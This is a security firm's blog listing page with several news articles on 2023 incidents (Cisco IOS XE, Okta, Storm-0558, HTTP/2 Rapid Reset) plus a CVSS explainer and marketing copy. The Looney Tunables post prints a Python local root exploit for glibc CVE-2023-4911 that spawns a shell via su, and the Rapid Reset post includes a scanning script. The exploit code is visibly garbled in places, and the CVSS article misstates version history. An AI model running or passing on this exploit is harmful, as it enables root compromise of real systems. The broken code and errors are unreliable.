top of page

15 items found for ""

  • Microsoft Resolves Windows Server VM Issues Caused by October Updates

    Within the rapidly evolving realm of technology, even the most dependable systems may experience unforeseen malfunctions. With the release of the cumulative update KB5031364 from last month, Windows Server administrators recently encountered a bewildering problem. Windows Server 2022 virtual machines (VMs) running on VMware ESXi hosts experienced blue screens and boot problems because of this upgrade, which was meant to improve system operation. The Conundrum Unveiled Following the implementation of the cumulative update, Windows administrators promptly reported problems with virtual machine initialization. The issue was limited to guest virtual machines (VMs) on VMware ESXi hosts that had an AMD Epyc physical processor installed. When Virtualization Based Security and System Guard Secure Launch were enabled in Windows Server 2022, along with the VMware option "Expose IOMMU to guest OS," the issue became apparent. Microsoft's Acknowledgment and Solution A few days after it first became apparent, Microsoft formally acknowledged the issue. More importantly, they provided a remedy in addition to identifying the impacted configurations. This month's Patch Tuesday saw the release of the cumulative update KB5032198 for Windows Server 2022, which addresses the fundamental cause. "This update fixes a known problem that affects virtual machines (VMs) that run on VMware ESXi hosts," Microsoft said in a statement. When the problem existed, Windows Server 2022 would not boot up, and impacted virtual machines would display a blue screen along with a stop code: FINAL ERROR DETECTED BY PNP Temporary Workarounds Microsoft also offered temporary fixes, acknowledging that not all administrators would be able to deploy the upgrade immediately. One way is to turn off the "Expose IOMMU to guest OS" setting in the virtual machine configurations that are impacted. However, because some situations necessitate having this option enabled by default, this workaround might only be applicable to a small number of PCs. Administrators who are experiencing issues with virtual machine booting might try deleting the KB5031364 upgrade as a last option. Although this fixes the boot issues, there's a big catch: it removes all security patches that were installed along with the upgrade. Historical Context Microsoft has previously experienced problems as a result of cumulative updates. The business published out-of-band Windows Server patches in January and December 2022 to address issues that were preventing Hyper-V virtual machines (VMs) from launching and caused issues when building new VMs on hosts. When a similar problem was identified earlier in the year that affected VMware ESXi virtual machines with Secure Boot enabled, VMware and Microsoft responded quickly. Addressing Community Concerns Concerns concerning the veracity of the material supplied have surfaced in response to community criticism. A few people bring up inconsistencies within the page, raising doubts about whether the provided links truly capture the breadth of the problem. Concerns have also been expressed over the issue with HyperV 2019 affecting Intel processors in addition to AMD processors. The following reports are important to notice since they attempt to illustrate different scenarios of virtual machines (VMs) failing to start after applying the October upgrades. Microsoft acknowledged the issue and rectified it particularly for a set of hardware and settings. This suggests that the reason of boot troubles varies among platforms or that they were unable to verify the issue for further affected setups. Conclusion Problems will inevitably come up in the dynamic world of virtual environments and software updates. Microsoft's quick fix for the Windows Server 2022 virtual machine issue shows their dedication to finding solutions quickly. Administrators must keep up with upgrades and short-term solutions offered by the tech giant as they navigate these troubleshooting waters.

  • Security Incident Involving Third-Party Vendor Compromises Okta Employee Health Information

    An alarming security breach at Rightway Healthcare, a third-party service provider, has compromised the personal health information (PHI) of approximately 5,000 Okta personnel. This incident represents the latest challenge for the identity and access management (IAM) leader in a series of recent security setbacks. Detailed Analysis - The breach report indicates that a sophisticated cyber intrusion at Rightway Healthcare, which provides services to Okta, led to the unauthorized disclosure of PHI belonging to Okta's current and former employees. The comprehensive data breach notifications were officially filed in California and Maine on the designated date. - Okta has clarified that its core services remain intact and secure, emphasizing that customer data has not been affected by this breach. The delineation from Okta services to third-party breaches is critical in understanding the scope and impact. - The threat actors reportedly accessed a file containing employee names, Social Security numbers, and health insurance details on September 23, as per Rightway's disclosure to Okta on October 12. Rightway's response to requests for additional information was not available at the time of reporting. Insightful Okta's recent history has been marred by security incidents since late July, with this third-party breach serving as a stark reminder of the continuous and complex nature of third-party risk management. Industry experts have weighed in on the significance of this breach, highlighting the critical need for rigorous security protocols and risk mitigation strategies, particularly concerning sensitive data handled by third-party vendors. Recent Events Timeline - Okta experienced a security event where unauthorized access was gained to their support system using compromised administrative credentials. This led to attacks on several Okta customers, raising concerns about systemic security practices. - The company has been proactive in addressing the breach by revoking potentially compromised session tokens and enhancing internal security measures. - Okta's disclosure of the incident was within regulatory timeframes, but the complex process of record analysis and deduplication delayed immediate notification. Market Impact - Okta has seen a significant decrease in market capitalization following the public disclosure of the breach, which is indicative of the gravity with which the market perceives security incidents involving high-profile companies. - As a critical player in the cybersecurity infrastructure of many corporations, Okta's security incidents have far-reaching implications, particularly given their expansive customer base that relies on their services for streamlined identity management across various platforms. References for further details 1) Okta's official statement on the unauthorized access incident and subsequent remedial actions can be found at [Unauthorized Access to Okta's Support Case Management System: Root Cause and Remediation]( 2) For information on generating HAR files for troubleshooting purposes, visit [Generate HAR Files]( 3) The official report filed with the Office of the Maine Attorney General is accessible at their [website]( 4) A detailed account of the tracking efforts for the unauthorized access to Okta's support system can be reviewed at [Tracking Unauthorized Access to Okta's Support System]( 5) For insights into the market response to Okta's security incident, refer to the report by CNBC: [Okta shares fall 11% after company says client files were accessed by hackers via its support system](

  • CVSS 4.0: The Evolution from CVSS v1 to CVSS v3

    The Common Vulnerability Scoring System (CVSS) is a commonly employed framework for evaluating the severity of vulnerabilities in computer systems and software. It provides organizations with a standardized method for prioritizing and addressing security vulnerabilities according to their potential impact. CVSS has undergone numerous updates and enhancements over the years to better reflect the evolving threat landscape and provide more precise vulnerability ratings. This article will examine the distinctions between CVSS v1 and the most recent version, CVSS 4.0. CVSS v1: The Foundation 2005 marked the introduction of CVSS v1, which served as the foundation for subsequent versions. It provided a basic framework for evaluating vulnerabilities, but it had some limitations that required attention. One of the most significant shortcomings of CVSS v1 was its lack of granularity. It relied on a limited number of metrics to evaluate vulnerabilities, making it difficult to accurately distinguish between various types and severity levels of vulnerabilities. Additionally, CVSS v1 failed to take into account temporal variables like the accessibility of exploits or the degree of remediation, both of which are crucial in determining the true risk a vulnerability poses. CVSS v3: A Comprehensive Approach The 2015 release of CVSS v3 introduced significant enhancements to address the deficiencies of its predecessor. It aimed to provide a more thorough and precise evaluation of vulnerabilities by incorporating additional metrics and temporal factors. The introduction of Base, Temporal, and Environmental metric groups is one of CVSS v3's most notable modifications. These groups enable a more thorough evaluation of vulnerabilities by considering factors such as the impact on the confidentiality, integrity, and availability of the affected system, as well as its exploitability and level of remediation. CVSS v3 also introduced a scoring range of 0 to 10, replacing CVSS v1's previous scoring range of 0 to 10+. This modification permits a more accurate rating of vulnerabilities and facilitates a more accurate comparison and ranking of security issues. The inclusion of exploitability metrics is a further significant enhancement of CVSS v3. These metrics consider attack vector, complexity, and required privileges to provide a more accurate evaluation of the likelihood of exploitation. CVSS v3 also considers temporal factors through its Temporal Metrics group. This group considers factors such as exploit code maturity, remediation level, and report confidence, allowing organizations to assess the actual risk posed by a vulnerability at a given time. CVSS 4.0: The Next Level The latest version of the framework, CVSS 4.0, is in the process of being developed at this time. The primary objective is to augment the precision and usability of CVSS by rectifying certain constraints that were identified in CVSS v3. An important enhancement of CVSS 4.0 is the Base metrics group's increased granularity. By conducting a more comprehensive assessment of vulnerabilities, this approach will consider various elements, including user interaction, privilege requirements, and attack complexity. In addition, CVSS 4.0 incorporates a novel metric known as Scope, which evaluates the extent to which a vulnerability affects both the compromised system and its immediate surroundings. This metric will assist organizations in prioritizing their responses in accordance with a greater comprehension of the potential repercussions of a vulnerability. CVSS 4.0 also tries to make the scoring system clearer and more consistent by improving the definitions of metrics and the numbers that go with them. Organizations will find it more convenient to analyze and contrast vulnerability ratings obtained from various sources. In conclusion, CVSS has evolved significantly from its initial version, CVSS v1, to the current version, CVSS 4.0. The introduction of additional metrics, consideration of temporal factors, and increased granularity have made CVSS a more comprehensive and accurate framework for assessing vulnerabilities. As the threat landscape continues to evolve, it is crucial for organizations to stay updated with the latest version of CVSS to effectively prioritize and address security vulnerabilities.

  • Infection of over 40,000 Cisco IOS XE devices with a zero-day backdoor

    Over 40,000 Cisco devices running the IOS XE operating system were affected by hackers using a newly found maximum severity vulnerability tracked as CVE-2023-20198. Customers are recommended to "deactivate the HTTP Server feature on all internet-facing systems" to secure their devices because there is no patch or solution currently available. Enterprise switches, industrial routers, access points, wireless controllers, aggregation, and branch routers all support the networking operating system Cisco IOS XE. Tens of thousands of Cisco devices have been compromised Around 10,000 Cisco IOS XE machines were initially thought to have been compromised, but when security researchers searched the internet for a more accurate number, the number started to climb. On Tuesday, October 17, the LeakIX indexing service for web apps and services that are publicly available on the web reported discovering about 30,000 affected devices, excluding restarted workstations. The search used Cisco's indications of compromise (IoCs) to assess whether CVE-2023-20198 was already successfully exploited on an exposed device, and it turned up thousands of affected hosts in Chile, the Philippines, and the United States. Source: LeakIX ( ix/status/1714342183141028307) LeakIX results for Cisco IOS XE devices exposed online. The private CERT from Orange reported on Wednesday 18 October 2023, that more than 34,500 Cisco IOS XE IP addresses had malicious implants because of exploiting CVE-2023-20198. This information was confirmed by Cisco using the same verification method. Additionally, CERT Orange provided a Python script ( CVE-202320198) to test for the presence of a malicious implant on a network device running Cisco IOS XE. The Censys search platform, which evaluates the attack surface for devices connected to the internet, reported an update on October 18 ( ), noting an increase to 41,983 compromised devices. On the open web, Censys results for Cisco IOS XE hosts are as follows: Censys It is difficult to determine the exact number of Cisco IOS XE devices that can be accessed via the open internet, but Shodan displays slightly more than 145,000 hosts, the majority of which are in the United States. Nearly 90,000 hosts were discovered to be exposed on the internet when security researcher Yutaka Sejiyama ( naha ) searched Shodan for Cisco IOS XE devices vulnerable to CVE-2023-20198. Many of the devices in the country come from service providers in the communications industry, including Google Fiber, Comcast, Verizon, Cox Communications, Frontier, AT&T, Spirit, CenturyLink, and Charter. Sejiyama's list also includes government agencies, banks, hospitals, medical facilities, universities, sheriff's offices, school districts, convenience stores, and banks. After device reboot, risk remains Although threat actors were using CVE-2023-20198 before September 28, when it was a zero-day, to set up a high-privilege account on vulnerable hosts and take complete control of the device, Cisco only publicly disclosed it on Monday 16 October 2023. On 17 October 2023, Cisco added new attacker IP addresses and usernames to its advisory ( ), as well as updated rules for Snort, an open-source network intrusion detection and intrusion prevention system. The researcher noted that the threat actors behind these attacks are releasing a non-persistent, harmful implant that is uninstalled after a device reboot. The brand-new accounts that it assisted in making are nevertheless still in use and "have level 15 privileges, meaning they have full administrator access to the device." According to Cisco's analysis, the threat actor gathers information about the device and conducts initial reconnaissance work. Additionally, the attacker is deleting users and clearing logs, most likely to conceal their activity. Although they were unable to identify the initial delivery method, the researchers believe that only one threat actor is responsible for these attacks. Cisco has not provided any further information regarding the attacks, but it has promised to do so once the investigation is over and a fix is available.

  • Unprecedented DDoS Attacks Launched Using HTTP/2 Rapid Reset Zero-Day Flaw.

    On Tuesday, leading tech giants Amazon Web Services (AWS), Cloudflare, and Google announced that they have successfully thwarted unprecedented distributed denial-of-service (DDoS) attacks using a new method dubbed "HTTP/2 Rapid Reset". Identified in late August 2023, these Layer 7 attacks have been logged as CVE-2023-44487, securing a CVSS score of 7.5 out of 10. Impressively, attacks targeting Google's infrastructure peaked at 398 million requests per second (RPS), whereas AWS and Cloudflare experienced attacks at 155 million and 201 million RPS respectively. The term "HTTP/2 Rapid Reset" pertains to a zero-day vulnerability in the HTTP/2 protocol, allowing for DDoS attacks. The protocol's ability to multiplex requests over one TCP connection, yielding concurrent streams, is integral. This vulnerability permits clients to prematurely terminate a request using an RST_STREAM frame. Exploited in the Rapid Reset attack, attackers can rapidly send and cancel requests, bypassing server limits and overburdening it without hitting its set threshold. Simply put, attackers can initiate and swiftly terminate numerous HTTP/2 streams on a sustained connection, thereby overwhelming websites. Notably, Cloudflare noted that such attacks could be executed with a relatively small botnet of around 20,000 machines. Grant Bourzikas, Cloudflare's Chief Security Officer, commented, "This zero-day granted malefactors a potent addition to their arsenal, allowing attacks of unparalleled magnitude." While HTTP/2 is employed by 35.6% of all websites (W3Techs), 77% of requests utilize HTTP/2, according to Web Almanac. Google Cloud has identified several variants of the Rapid Reset attacks, some even surpassing the efficiency of standard HTTP/2 DDoS attacks. The protocol now integrates an improved "request cancellation" feature. However, since late August, ill-intentioned parties have exploited this to inundate servers with HTTP/2 requests and resets, rendering them incapable of processing new requests. Google shed light on the issue, explaining that the protocol doesn't necessitate coordinated cancellation between client and server. HTTP/2 Rapid reset logic overview(Google) Cloudflare highlighted the particular vulnerability of HTTP/2 proxies or load-balancers to rapid reset requests. Its network was mainly compromised at the junction between the TLS proxy and its upstream counterpart. Consequently, an uptick in 502 error reports was observed among Cloudflare's clientele. Requests stream diagram(Cloudflare) To counter these threats, Cloudflare employed a 'IP Jail' system, tailored to manage high-volume attacks. This approach restricts malicious IPs from utilizing HTTP/2 on any Cloudflare domain for a specific duration, with legitimate users on the same IP experiencing a minor performance dip. Amazon confirmed that it successfully neutralized numerous such attacks, emphasizing that customer service availability remained unaffected throughout. Attacks mitigated by Amazon in September 2023 (AWS) All three tech behemoths advocate for a holistic approach to counter these threats, emphasizing the utilization of all accessible HTTP-flood protection tools and enhancing DDoS defense strategies. Notably, as attackers exploit an intrinsic aspect of the HTTP/2 protocol, a comprehensive fix to entirely thwart this DDoS technique remains elusive. Proof of Concept Code to Check Vulnerability (CVE-2023-44487) """ Proof of Concept Code to Check Vulnerability (CVE-2023-44487) Developer: Aegisbyte Website: Contact Email: Date Released: October 10, 2023 """ import ssl import csv import socket import httpx import argparse from h2.connection import H2Connection from h2.config import H2Configuration from http.client import HTTPConnection, HTTPSConnection from urllib.parse import urlparse from datetime import datetime class IPAddress: PREFIX = "192.168.1." IPs = [PREFIX + str(i) for i in range(1, 255)] @classmethod def retrieve_ips(cls, proxy_detail): selected_ip = cls.IPs[0] with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as conn_socket: conn_socket.settimeout(2) try: conn_socket.connect(('', 1)) local_ip = conn_socket.getsockname()[0] except: local_ip = '' return local_ip, selected_ip def http2_status(target_url, proxy_detail): params = {'http2': True, 'verify': False} if proxy_detail: params['proxies'] = { 'http://': proxy_detail['http'], 'https://': proxy_detail['https'] } try: with httpx.Client(**params) as client: response = client.get(target_url) if response.http_version == 'HTTP/2': return 1, "" return 0, response.http_version except Exception as e: return -1, str(e) def reset_stream_action(host, port, stream_id, route='/', timeout_val=5, proxy_addr=None): ssl_params = ssl.create_default_context() ssl_params.check_hostname = False ssl_params.verify_mode = ssl.CERT_NONE connection = HTTPSConnection(host, port, timeout=timeout_val, context=ssl_params) if port == 443 else HTTPConnection(host, port, timeout=timeout_val) try: connection.connect() h2_config = H2Configuration(client_side=True) h2_conn = H2Connection(config=h2_config) h2_conn.initiate_connection() connection.send(h2_conn.data_to_send()) headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'), (':path', route)] h2_conn.send_headers(stream_id, headers) connection.send(h2_conn.data_to_send()) while True: chunk = connection.sock.recv(65535) if not chunk: break events = h2_conn.receive_data(chunk) for evt in events: if evt.stream_id == stream_id: h2_conn.reset_stream(evt.stream_id) connection.send(h2_conn.data_to_send()) return 1, "" return 0, "No response" except Exception as e: return -1, str(e) finally: connection.close() def extract_url_data(url): parts = urlparse(url) return parts.hostname, parts.port or (443 if parts.scheme == 'https' else 80), parts.path or "/" def main(): parser = argparse.ArgumentParser(description="Check HTTP/2 support and potential vulnerabilities.") parser.add_argument('-i', '--input_file', required=True, help="Input file containing list of URLs.") parser.add_argument('-o', '--output_file', required=True, help="Output file for results.") parser.add_argument('--proxy_addr', help='HTTP/HTTPS proxy URL', default=None) args = parser.parse_args() proxy_data = {'http': args.proxy_addr, 'https': args.proxy_addr} if args.proxy_addr else {} local_ip, test_ip = IPAddress.retrieve_ips(proxy_data) try: with open(args.input_file, 'r') as in_file, open(args.output_file, 'w', newline='') as out_file: csv_writer = csv.writer(out_file) csv_writer.writerow(['Timestamp', 'Local IP', 'Test IP', 'URL', 'Status', 'Details']) for line in in_file: web_address = line.strip() if web_address: time_now ="%Y-%m-%d %H:%M:%S") support_status, err_msg = http2_status(web_address, proxy_data) domain, port_num, path = extract_url_data(web_address) if support_status == 1: result, err_detail = reset_stream_action(domain, port_num, 1, path, proxy_addr=args.proxy_addr) if result == 1: csv_writer.writerow([time_now, local_ip, test_ip, web_address, 'VULNERABLE', '']) else: csv_writer.writerow([time_now, local_ip, test_ip, web_address, 'POSSIBLE', f'Error in reset: {err_detail}']) elif support_status == 0: csv_writer.writerow([time_now, local_ip, test_ip, web_address, 'NOT SUPPORTED', err_msg]) else: csv_writer.writerow([time_now, local_ip, test_ip, web_address, 'ERROR', err_msg]) print(f"Results successfully written to: {args.output_file}") except FileNotFoundError: print(f"Error: The input file {args.input_file} was not found.") except Exception as e: print(f"An unexpected error occurred: {e}") if __name__ == "__main__": main() References

  • Looney Tunables: In-depth Analysis of Local Privilege Escalation

    Executive Summary The GNU C Library's dynamic loader,, is responsible for locating and initializing shared libraries required by an executable. This component is particularly critical as it's invoked with elevated privileges when executing specific binaries, such as set-user-ID and set-group-ID programs. Historically, handling of certain environment variables, notably LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH, has presented security risks. Qualys has identified a buffer overflow vulnerability within the dynamic loader's processing of the GLIBC_TUNABLES environment variable. This flaw was introduced in glibc 2.34 with the commit labeled 2ed18c in April 2021. The impact of this vulnerability is substantial, permitting escalation to root privileges on several mainstream distributions. Qualys refrains from publicizing the specific exploitation technique at this time. Nevertheless, due to the simplicity of the buffer overflow, there's a possibility that other security researchers may develop and release their own exploits soon after this advisory. Detailed Analysis At initialization, invokes the __tunables_init() function to scan the environment for GLIBC_TUNABLES variables. Upon detection, it duplicates this variable, processes and sanitizes the copy, and then replaces the original GLIBC_TUNABLES with this sanitized version. Within the process of sanitizing, the function parse_tunables removes potentially harmful tunables while retaining safe ones. However, when encountering a malformed GLIBC_TUNABLES variable (e.g., "tunable1=tunable2=AAA"), a buffer overflow can occur, corrupting adjacent memory. Qualys' further investigations using fuzzing tools like AFL++ and libFuzzer quickly identified this vulnerability, emphasizing its detectability. Proof Of Concept CVE-2023-4911 Executing the command: $ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help Note: The results in a segmentation fault, confirming the vulnerability. Exploit in Python: $ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help Here's your C code converted to Python using the given constraints: #!/usr/bin/env python3 # PoC by Aegisbyte # Credits to Qualys, Inc. # Download pwntools library # Pwntools is a CTF framework and exploit development library. # Written in Python, it is designed for rapid prototyping and # development, and intended to make exploit writing as simple as # possible. # GitHub Link: from pwn import * import os import time context.os = "linux" context.arch = "x86_64" FILL_SIZE = 0xd00 BOF_SIZE = 0x600 libc = ELF("/lib/x86_64-linux-gnu/") d = bytearray(open(libc.path, "rb").read()) sc = asm(shellcraft.setuid(0) + shellcraft.setgid(0) + orig =["__libc_start_main"], 0x10) idx = d.find(orig) d[idx : idx + len(sc)] = sc open("./", "wb").write(d) def time_us(): return int(time.time() * 1e6) filler = ("GLIBC_TUNABLES=glibc.malloc.mxfast=" + "F" * (FILL_SIZE - 34)).encode() kv = ("GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=" + "A" * (BOF_SIZE - 49)).encode() filler2 = ("GLIBC_TUNABLES=glibc.malloc.mxfast=" + "F" * (BOF_SIZE + 0x20 - 34)).encode() dt_rpath = b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xEC" * (0x20000 // 8) envp = [b""] * 0x1000 envp[0] = filler envp[1] = kv envp[0x65] = b"" envp[0x65 + 0xb8] = b"\x30\xf0\xff\xff\xfd\x7f" envp[0xf7f] = filler2 for i in range(0x2f): envp[0xf80 + i] = dt_rpath envp[0xffe] = b"AAAA" argv = [b"/usr/bin/su", b"--help", None] if notos.path.exists("\""): os.mkdir("\"") with open("\"/", "wb") as dfd, open("./", "rb") as sfd: buf = while buf: dfd.write(buf) buf = ct = 1 while True: if ct % 100 == 0: print(f"try {ct}") pid = os.fork() if pid == 0: # child os.execve(argv[0], argv, envp) else: # parent wstatus, _ = os.wait() start_time = time_us() if os.WIFSIGNALED(wstatus) and time_us() - start_time > 1000000: # likely a shell return break ct += 1 Note: Make sure to test this in a safe environment, as it involves creating and running a custom binary. Exploitation Mechanics The buffer overflow originates from memory allocations using the __minimal_malloc function, which acquires memory via mmap(). Qualys explored various avenues for exploiting this vulnerability: Initially, the approach to overwrite the link_map structure's l_next and l_prev pointers was considered, but this approach was thwarted by assertions within The successful approach focused on the uninitialized pointers within the link_map structure, particularly l_info[DT_RPATH]. By manipulating this pointer, Qualys demonstrated that could be directed to a malicious directory, facilitating arbitrary code execution. The exploit's effectiveness hinges on the guessability of memory addresses. With persistence and iterative attempts, the exploitation technique managed to hijack the library loading mechanism, achieving root privileges in most scenarios.

  • Regular Cloud PenetrationTesting: The Crucial Aspect to Combat Evolving Threats.

    Table of contents Introduction Understanding Cloud Penetration Testing Benefits of Regular Cloud Penetration Testing Key Aspects of an Effective Regular Cloud Penetration Testing Plan Choosing the Right Cloud Penetration Testing Vendor Conclusion Introduction Welcome to the world of cloud penetration testing! In today’s digital era, where every organization is moving to the cloud, it is crucial to ensure their data is secure. The answer to this is to have a robust cloud penetration testing plan in place. Cloud Penetration Testing Cloud Penetration testing is a type of security testing that checks the vulnerabilities of a cloud system by attempting to exploit them. It is a simulated attack that enables security experts to identify possible entry points that hackers may use to access sensitive data. Why is it Important? Cloud Penetration Testing is crucial as it detects security flaws in the cloud before they are exploited by hackers. The benefits of having a well-formulated cloud penetration testing plan include maintaining the integrity and confidentiality of data, avoiding financial losses associated with data breaches, and above all, protecting an organization’s reputation. Recent Security Breaches There have been instances where significant data breaches have caused significant harm to companies that depended on the cloud. These breaches could have been prevented if there were adequate cloud penetration testing measures in place. Stay ahead of the curve and join the league of the smart by signing up for cloud penetration testing services. Understanding Cloud Penetration Testing Cloud Penetration Testing is an exhaustive process of testing cloud environments to identify vulnerabilities and confirm the effectiveness of security controls. It aims to discover potential weaknesses in the cloud infrastructure, applications, and data storage, which attackers could exploit. Conducting regular testing will help you to evaluate the resilience of your cloud environment against cyber-attacks. There are different types of cloud penetration testing which include black box, gray box, and white box testing, which vary based on the level of information provided to the tester. Challenges in cloud penetration testing as new threats emerge daily make it necessary to continuously update security tools and techniques. Testing cloud applications and systems requires specialized knowledge and skills. The process of cloud penetration testing typically starts with information gathering and reconnaissance, scanning and enumeration, gaining access, and escalating privileges. Once the potential vulnerabilities and weaknesses are identified, testers provide a detailed report outlining remediation steps along with prioritization, which the organization can take to improve its security posture. Overall, regular cloud penetration testing plays a vital role in identifying potential vulnerabilities in the cloud environment which could be exploited by attackers. It helps organizations to strengthen their security measures and ensure compliance with regulations and standards. Benefits of Regular Cloud Penetration Testing Regular Cloud Penetration Testing provides several benefits in safeguarding your IT infrastructure from evolving cyber threats. It can help in preventing data loss and leakage by identifying vulnerabilities in your security framework. It also provides robust protection against cyberattacks and threats. Additionally, it plays a crucial role in identifying potential vulnerabilities before they can be exploited by malicious actors. Regular Cloud Penetration Testing allows you to stay ahead of potential cyber threats and ultimately save on significant data breaches. Moreover, complying with regulations and standards such as HIPAA, PCI-DSS, and GDPR becomes much easier with Regular Cloud Penetration Testing in place. By partnering with the right vendor, you can ensure your organization’s data is protected against all known and unknown threats. Key Aspects of an Effective Regular Cloud Penetration Testing Plan The success of cloud penetration testing heavily relies on the plan’s key aspects. The following factors need to be considered to create an effective plan: Scope Definition: The organization must determine which assets need to be tested and identify the scope and limits of the test. Factors such as network and device accessibility, permissions, and user roles should be considered. Testing Frequency: Regular cloud penetration testing should be scheduled periodically, and the timing should be based on risk, infrastructure stability, and new technology integration. This will make sure any new vulnerabilities or threats are detected early on. Selection of Testing Techniques: Appropriate testing tools and techniques must be selected depending on the scope, time, and budget of the test. These may include Application, Network, and Physical-layer penetration testing, social engineering, and Vulnerability assessment. Reporting and Remediation: Clear and concise reporting of test results and vulnerabilities identified is required. This will ensure that the organization can take the necessary steps to fix vulnerabilities and reduce risk. Communication with Stakeholders: The organization should also consider communicating the test’s results and findings to stakeholders. This will allow the stakeholders to understand the testing process, risks, and steps being taken to address them. An organization should consider these factors when selecting a cloud penetration testing provider. As always, prevention is better than cure, so strive to keep your system at the top of its game. Choosing the Right Cloud Penetration Testing Vendor Choosing the right cloud penetration testing vendor is crucial. Factors to consider include experience, expertise, and cost. Ask the right questions, such as how they handle reporting and remediation, and whether they use automated tools. Consider in-house options, but don’t overlook the value of outsourcing to experts. Conclusion Regular Cloud Penetration Testing is essential to safeguard against evolving cyber threats. It helps identify vulnerabilities before it’s too late, complies with regulations and standards, and prevents data loss or cyberattacks. Don’t compromise on security and contact us for our comprehensive Cloud Penetration Testing services today.

  • Microsoft explains how a crash dump led to a major security breach in Outlook

    Microsoft disclosed on Wednesday 6 September, that a threat actor based in China and known as Storm-0558 obtained the inactive consumer signing key to forge tokens and access Outlook by compromising an engineer's corporate account. This allowed the threat actor to do both things. This gave the adversary the ability to steal the key and access a debugging environment that contained information about a crash of the consumer signing system. The malfunction of the computer system occurred in April of 2021. The Microsoft Security Response Center (MSRC) stated in a post-mortem report that "A consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process ('crash dump')" "It is not necessary for the signing key to be included in the crash dumps, which obscure sensitive information. In this instance, the key was able to be included in the crash dump because of race conditions. Our systems were unable to identify the presence of crucial information in the crash dump. The company that makes Windows has stated that the crash dump was moved to a debugging environment on the internet-connected corporate network. It is from this location that it is suspected that Storm-0558 obtained the key after breaking into the engineer's corporate account. Because of the policies that Microsoft has in place regarding the retention of logs, it is currently unknown whether this is the precise mechanism that was used by the threat actor. Microsoft has stated that it does not have logs that offer concrete proof of the exfiltration. The report published by Microsoft makes additional references to spear-phishing and the use of malware that steals tokens, but it does not go into detail regarding the methodology behind how the engineer's account was compromised in the first place, whether other corporate accounts were hacked, or when the company realized that its security had been breached. Despite this, the most recent turn of events provides some insight into a chain of security blunders that culminated in the signing key falling into the hands of an expert actor with a "high degree of technical tradecraft and operational security." Microsoft has given the hacking group known as Storm-0558 the name Storm-0558 as a moniker. This hacking group has been linked to the breach of approximately 25 organizations by obtaining unauthorized access to Outlook Web Access (OWA) and The consumer signing key was used by this hacking group. An improper validation of the key that allowed it to be trusted for signing Azure AD tokens was identified as the cause of the zero-day vulnerability. Evidence suggests that the malicious cyber activity started one month earlier than it was discovered, in June 2023, when it was investigated. This was made possible because the "mail system would accept a request for enterprise email using a security token signed with the consumer key," which in turn made the previous point possible. Microsoft has since resolved the "problem" that was being experienced. After further investigation, cloud security company Wiz revealed in July that the stolen Microsoft consumer signing key may have been used to gain unauthorized access to a variety of other cloud services. Microsoft, on the other hand, stated that it did not discover any additional evidence of unauthorized access to applications that were not email inboxes. It has also widened access to security logging in response to criticism that the feature was restricted to customers who had Purview Audit (Premium) licenses, thereby preventing others from accessing forensics data. This criticism was brought about by the fact that the feature was only available to those customers.

  • DEF CON 31 Hacker Jeopardy

    Hacker Jeopardy: A DEF CON Tradition For many in the hacking community, DEF CON, held annually in Las Vegas, isn’t just a conference; it’s a reunion. Among the many events and challenges that make DEF CON a unique experience, one stands out for its blend of knowledge, wit, and alcohol: Hacker Jeopardy. What is Hacker Jeopardy? Inspired by the classic TV game show “Jeopardy!”, Hacker Jeopardy puts contestants’ cybersecurity knowledge to the test. But there’s a twist: while the format is similar, with answers provided in the form of a question, the content is all about hacking, the culture around it, and some of the inside jokes of the community. A Blend of Fun and Knowledge Hacker Jeopardy is notorious for its raucous atmosphere. Audience participation is encouraged, with attendees often shouting out (sometimes incorrect) answers, and even occasional playful boos. Another key element? Drinking. While not mandatory, many contestants choose to imbibe, and there’s even a special category dedicated to drinking. Culturally Significant While on the surface it might seem like just a fun game, Hacker Jeopardy is also an important reflection of hacker culture. The questions cover a range of topics from the history of hacking, to tools, techniques, and notable figures in the community. It’s a way for attendees, both new and old, to test and expand their knowledge. Why You Should Watch or Participate If you’re attending DEF CON, Hacker Jeopardy is a must-see. Not only is it entertaining, but it’s also a way to gauge your own knowledge and perhaps learn something new. For those brave enough, participating is a way to achieve a small piece of DEF CON fame. Conclusion Hacker Jeopardy, with its mix of humor, knowledge, and camaraderie, embodies the spirit of DEF CON. It’s more than just a game; it’s a celebration of hacker culture.

  • Azure OpenAI Receives P-ATO granted by FedRAMP

    Microsoft Azure OpenAI Service has successfully obtained the U.S. Federal Risk and Authorization Management Program (FedRAMP) High Provisional Authorization to Operate (P-ATO), granted by the FedRAMP Joint Authorization Board (JAB). This significant achievement builds on our prior announcement regarding the deployment of Azure OpenAI Service in commercial environments for Azure Government customers. With the recent FedRAMP High authorization, agencies demanding FedRAMP High can directly engage with Azure OpenAI within Azure's commercial infrastructure. Microsoft officially unveiled its Azure OpenAI Service for governmental use in early June. This launch facilitates federal agencies' access to robust language models operable within Microsoft's U.S. government-focused cloud service, Azure Government. The service enables government departments to tailor language models, including GPT-3 and GPT-4, for particular tasks such as content creation, summarization, semantic search, and natural language-to-code translation. These language models are seamlessly operable within Azure Government, Microsoft’s dedicated cloud service for U.S. government agencies. Microsoft assures that Azure OpenAI Service maintains a firewall with Microsoft's corporate network, and no governmental agency data contributes to OpenAI model training. This recent authorization follows an impact level 2 provisional authorization from the Defense Information Systems Agency. The recognitions arrived post an inquiry launched by the Federal Trade Commission into potential consumer protection violations by OpenAI. The FTC alleged in a formal letter to OpenAI, claiming the company employed deceptive or unfair privacy or data security practices, resulting in reputational damage. The commission dispatched the letter in response to consumers' grievances that ChatGPT propagated “false, misleading, disparaging, or harmful” information about individuals. This milestone also aligns with several government agencies’ interest in how generative artificial intelligence, the technology fueling ChatGPT, can be adapted for diverse use cases. Users can access the Azure OpenAI Service via REST APIs, Python SDK, or Microsoft’s web-based interface in the Azure AI Studio. This service is readily available to all Azure Government customers and partners. Microsoft emphasizes its commitment to safeguarding government customers' data, privacy, and security by encrypting all Azure traffic within a region or between regions using MACsec, employing AES-128 block cipher for encryption. Achieving the FedRAMP High authorization demonstrates conformity with the rigorous security standards that the federal government imposes on cloud service 